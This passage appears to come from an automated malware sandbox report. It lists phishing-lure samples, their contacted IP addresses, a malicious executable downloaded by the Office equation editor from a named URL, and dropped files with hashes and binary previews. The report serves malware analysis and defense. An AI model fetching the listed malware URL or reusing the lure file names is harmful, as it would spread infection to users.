                                                                                DHL_SHIPMENT_ADDRESS_4495749574946596484658458458,pdf.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                DOCUMENT_395849584954.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.165
                                                                                RFQ_38463846393646388368364834.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Doc_3847468364836483638463,pdf.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                ATE-ASFRDoc_347343.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.165
                                                                                5nXX3v5zWn.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Doc_386384934.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.165
                                                                                Doc_38464835648343.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.165
                                                                                pfI78aQqmv.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Inquiry.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.165
                                                                                Doc_87654334567.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                PO-4600017931.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.165
                                                                                HTOj2DnVlw.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                i7Qs22QuKz.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Doc.xlsxGet hashmaliciousBrowse
                                                                                • 185.26.106.165
                                                                                Doc_3956385638364836437638364738365483647383648373638463836483648363846383.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Doc_987945678.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Ref-2021-05-14.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Doc_38464856384683648364.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Document_printout_copy_34853936483648364393743836384.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                DHL_SHIPMENT_ADDRESS_4495749574946596484658458458,pdf.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                DOCUMENT_395849584954.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.165
                                                                                RFQ_38463846393646388368364834.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194
                                                                                Doc_3847468364836483638463,pdf.exeGet hashmaliciousBrowse
                                                                                • 185.26.106.194

                                                                                JA3 Fingerprints

                                                                                No context

                                                                                Dropped Files

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exekwFDCU89PZ.exeGet hashmaliciousBrowse
                                                                                  C:\Users\user\AppData\Roaming\WzyRXCWtdGSdEA.exekwFDCU89PZ.exeGet hashmaliciousBrowse
                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Doc_87654334567[1].exekwFDCU89PZ.exeGet hashmaliciousBrowse

                                                                                      Created / dropped Files

                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                      Process:C:\Users\Public\vbc.exe
                                                                                      File Type:Microsoft Cabinet archive data, 61020 bytes, 1 file
                                                                                      Category:dropped
                                                                                      Size (bytes):61020
                                                                                      Entropy (8bit):7.994886945086499
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:IZ/FdeYPeFusuQszEfL0/NfXfdl5lNQbGxO4EBJE:0tdeYPiuWAVtlLBGm
                                                                                      MD5:2902DE11E30DCC620B184E3BB0F0C1CB
                                                                                      SHA1:5D11D14A2558801A2688DC2D6DFAD39AC294F222
                                                                                      SHA-256:E6A7F1F8810E46A736E80EE5AC6187690F28F4D5D35D130D410E20084B2C1544
                                                                                      SHA-512:EFD415CDE25B827AC2A7CA4D6486CE3A43CDCC1C31D3A94FD7944681AA3E83A4966625BF2E6770581C4B59D05E35FF9318D9ADADDADE9070F131076892AF2FA0
                                                                                      Malicious:false
                                                                                      Preview: MSCF....\.......,...................I........l.........R.q .authroot.stl.N....5..CK..8T....c_.d....A.K....=.D.eWI..r."Y...."i..,.=.l.D.....3...3WW.......y...9..w..D.yM10....`.0.e.._.'..a0xN....)F.C..t.z.,.O20.1``L.....m?H..C..X>Oc..q.....%.!^v%<...O...-..@/.......H.J.W...... T...Fp..2.|$....._Y..Y`&..s.1........s.{..,.":o}9.......%._.xW*S.K..4"9......q.G:.........a.H.y.. ..r...q./6.p.;.`=*.Dwj......!......s).B..y.......A.!W.........D!s0..!"X...l.....D0...........Ba...Z.0.o..l.3.v..W1F hSp.S)@.....'Z..QW...G...G.G.y+.x...aa`.3..X&4E..N...._O..<X.......K...xm..+M...O.H...)..........*..o..~4.6.......p.`Bt.(..*V.N.!.p.C>..%.ySXY.>.`..f|.*...'^K`\..e......j/..|..)..&i...wEj.w...o..r<.$.....C.....}.x...L..&..).r..\...>....v........7...^..L!.$..'m...*,*.....7F$..~..S.6$S.-y....|.!.....x...~k...Q/.w.e...h.[...9<x...Q.x.][}*_%Z..K.).3..'....M.6QkJ.N........Y..Q.n.[.(.... ...Bg..33..[...S..[... .Z..<i.-.]...po.k.,...X6......y3^.t[.Dw.]ts. R..L..`..ut_F....
                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                      Process:C:\Users\Public\vbc.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):326
                                                                                      Entropy (8bit):3.1392054451166236
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:kKjafqdoW+N+SkQlPlEGYRMY9z+4KlDA3RUeIlD1Ut:OG5kPlE99SNxAhUe0et
                                                                                      MD5:73D434F5661B6D463F837080EA943642
                                                                                      SHA1:2CD8845DF98F90DB4BF2DD9209A13437A63DB3B0
                                                                                      SHA-256:EF803AE8B228F3D5EEF8B4DB9F65942A0F90D72579AF0470F87DD1A5AA8A06D6
                                                                                      SHA-512:88D5DFB03A5EE72A3D41877CB900AE4160BE6D70A8EEE75D9F6C6601B6D0AC1FD8356CDFF075ECE6FCD3A3F63B04C14471C507BBDC3C79E41D29F7165883EDA5
                                                                                      Malicious:false
                                                                                      Preview: p...... .........'..j...(....................................................... .........T'._......$...........\...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.6.5.4.2.7.7.5.f.d.7.1.:.0."...
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Doc_87654334567[1].exe
                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:downloaded
                                                                                      Size (bytes):479232
                                                                                      Entropy (8bit):7.4170903584629215
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:NUdeni+TLedHTiw3CzfM5B2OR0GU4V24TfWOQCs/I:KciCqdziw3KeRHtJHs/I
                                                                                      MD5:6733D5E8934EAFF7C0087E7DE2C8E62A
                                                                                      SHA1:6C0B89DC4C773E51D660780450CBD148F2FF3211
                                                                                      SHA-256:3441D4122B712A32E1C0518F02903A632ECBF557FBAB71C510C732474D326CD1
                                                                                      SHA-512:B6804A6968FA7A6F68D1A8F6161A0C69584DBFEB88EFF5F7784C259F2886FE1B444438576D47AB5DDA24496A619DFBFFE02050BC679A3F3E13DD6BC82F61C3C1
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 13%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: kwFDCU89PZ.exe, Detection: malicious, Browse
                                                                                      IE Cache URL:http://arkemagrup.com/Doc_87654334567.exe
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....u.`..............0.. ... .......5... ...@....... ....................................@.................................05..O....@.......................`....................................................... ............... ..H............text........ ... .................. ..`.rsrc........@.......0..............@..@.reloc.......`.......@..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3593FE9D.png
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):11303
                                                                                      Entropy (8bit):7.909402464702408
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                                                      MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                                                      SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                                                      SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                                                      SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                                                      Malicious:false
                                                                                      Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\38D6D8CE.emf
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                      Category:dropped
                                                                                      Size (bytes):648132
                                                                                      Entropy (8bit):2.8123789386507605
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:z34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:74UcLe0JOcXuunhqcS
                                                                                      MD5:6CB928BE3E67F24A61029E293EF3D385
                                                                                      SHA1:2026D18C43EC013CCABD05193648ED51F11723D6
                                                                                      SHA-256:27BB1F6D2D0771E33EEABDC1A8884E798B802497B0ADD328EF2967BEC69481AA
                                                                                      SHA-512:FD5DC00F1513E2740D488D63B73D529279635D52BE9CEFD29B23018ABEF9776D602BB7C6644510E6731451B78C104F2B57DCC462C210CBF66B8B5EB919EFFC3B
                                                                                      Malicious:false
                                                                                      Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i...................................................../Q$.....<.-z8Q.@..%.....<.<.<.......<. .<..N.R..<...<.......<...<..N.R..<...<. ....y8Q..<...<. ............z8Q............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i...........,.<.X.....<...<...........ovdv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4AAF8EAF.png
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):94963
                                                                                      Entropy (8bit):7.9700481154985985
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
                                                                                      MD5:17EC925977BED2836071429D7B476809
                                                                                      SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
                                                                                      SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
                                                                                      SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
                                                                                      Malicious:false
                                                                                      Preview: .PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4E649BE6.jpeg
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
                                                                                      Category:dropped
                                                                                      Size (bytes):62140
                                                                                      Entropy (8bit):7.529847875703774
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
                                                                                      MD5:722C1BE1697CFCEAE7BDEFB463265578
                                                                                      SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
                                                                                      SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
                                                                                      SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
                                                                                      Malicious:false
                                                                                      Preview: ......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5BA4E7B3.png
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):94963
                                                                                      Entropy (8bit):7.9700481154985985
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
                                                                                      MD5:17EC925977BED2836071429D7B476809
                                                                                      SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
                                                                                      SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
                                                                                      SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
                                                                                      Malicious:false
                                                                                      Preview: .PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8762AF39.png
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):11303
                                                                                      Entropy (8bit):7.909402464702408
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                                                      MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                                                      SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                                                      SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                                                      SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                                                      Malicious:false
                                                                                      Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8D4B7BFA.jpeg
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
                                                                                      Category:dropped
                                                                                      Size (bytes):62140
                                                                                      Entropy (8bit):7.529847875703774
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
                                                                                      MD5:722C1BE1697CFCEAE7BDEFB463265578
                                                                                      SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
                                                                                      SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
                                                                                      SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
                                                                                      Malicious:false
                                                                                      Preview: ......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A9691677.emf
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                      Category:dropped
                                                                                      Size (bytes):7608
                                                                                      Entropy (8bit):5.0848395387371825
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:+SpE1LSR5gs3iwiMO10VCVU7ckQadVDYM/PVfmhDqpH:5Sq+sW31RGtdVDYM3VfmkpH
                                                                                      MD5:59A006365F7CA7E6809AEC593181D9BA
                                                                                      SHA1:DDBB1CBA3306CEC237FB6D0130AD72B7EFF610BC
                                                                                      SHA-256:8C2E1E41CEB13848ADEA43DEA1382211D57B0C72B505D4E6054F7505ED624B4E
                                                                                      SHA-512:187F9B65553198DF1B17083A86B5EF2D3610445094A2D29C77E1A142E1E8CBCD50F044DE3089509FFA43E7E1C41161FF1DB6E96620867666E0FB4B05C89652B4
                                                                                      Malicious:false
                                                                                      Preview: ....l...,...........<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I...................................................$.6.).X...`...d............................q....\.............,.....q........6.u...q....`..q..$.$y.w..................w....$.....|.d...n...d...^ q.....^ q.......(GQ.....-.......<.w................<..v.Znv....X.XR......$.......................ovdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .............................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AAE88E0C.jpeg
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                                                                      Category:dropped
                                                                                      Size (bytes):85020
                                                                                      Entropy (8bit):7.2472785111025875
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                                                                      MD5:738BDB90A9D8929A5FB2D06775F3336F
                                                                                      SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                                                                      SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                                                                      SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                                                                      Malicious:false
                                                                                      Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FC2C1618.jpeg
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                                                                      Category:dropped
                                                                                      Size (bytes):85020
                                                                                      Entropy (8bit):7.2472785111025875
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                                                                      MD5:738BDB90A9D8929A5FB2D06775F3336F
                                                                                      SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                                                                      SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                                                                      SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                                                                      Malicious:false
                                                                                      Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso4E71.tmp
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                                                      Category:dropped
                                                                                      Size (bytes):1254
                                                                                      Entropy (8bit):5.835900066445133
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                                                      MD5:A3C62E516777C15BF216F12143693C61
                                                                                      SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                                                      SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                                                      SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                                                      Malicious:false
                                                                                      Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso4EA1.tmp
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                                                      Category:dropped
                                                                                      Size (bytes):1254
                                                                                      Entropy (8bit):5.835900066445133
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                                                      MD5:A3C62E516777C15BF216F12143693C61
                                                                                      SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                                                      SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                                                      SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                                                      Malicious:false
